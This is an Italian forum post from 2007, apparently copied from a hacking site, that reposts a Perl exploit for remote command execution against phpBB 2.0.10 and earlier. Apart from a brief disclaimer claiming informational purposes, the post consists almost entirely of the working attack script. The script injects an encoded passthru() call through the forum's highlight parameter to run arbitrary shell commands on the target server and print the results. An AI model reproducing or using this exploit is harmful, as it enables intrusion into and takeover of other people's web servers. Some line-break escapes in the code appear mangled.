- 12 Aprile 2007
- 3.227
- 0
- Miglior risposta
- 0
Non mi assumo nessuna responsabilità sull'uso che facciate e posto il materiale solo a scopo informativo
E' DA COMPILARE IN PERL
quote:
MATERIALE PRESO DA EUROHACKERS.IT
quote:
phpbb 2.0.6 , 2.0.8 , 2.0.9 , 2.0.10 exploit
#!/usr/bin/perl
if (@ARGV < 4)
{
print q(############################################################
phpBB <=2.0.10 remote command execution exploit
############################################################
usage:
r57phpbb2010.pl [DIR] [NUM] [CMD] params: [URL] - server url e.g. [url]www.phpbb.com
[DIR] - directory where phpBB installed e.g. /phpBB/ or /
[NUM] - number of existing topic
[CMD] - command for execute e.g. ls or "ls -la"
############################################################
);
exit;
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$topic = $ARGV[2];
$cmd = $ARGV[3];
$serv =~ s/(http://)//eg;
print "*** CMD: [ $cmd ]rn";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~rn";
$cmd=~ s/(.*);$/$1/eg;
$cmd=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$topic=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$path = $dir;
$path .= 'viewtopic.php?t=';
$path .= $topic;
$path .= '&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20';
$path .= $cmd;
$path .= '%3B%20%65%63%68%6F%20%5F%45%4E%44%5F';
$path .= '&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] CONNECT FAILEDrn";
print $socket "GET $path HTTP/1.1n";
print $socket "Host: $servn";
print $socket "Accept: */*n";
print $socket "Connection: closenn";
$on = 0;
while ($answer = <$socket>)
{
if ($answer =~ /^_END_/) { print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~rn"; exit(); }
if ($on == 1) { print " $answer"; }
if ($answer =~ /^_START_/) { $on = 1; }
}
print "[-] EXPLOIT FAILEDrn";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~rn";
### EOF ###
E' DA COMPILARE IN PERL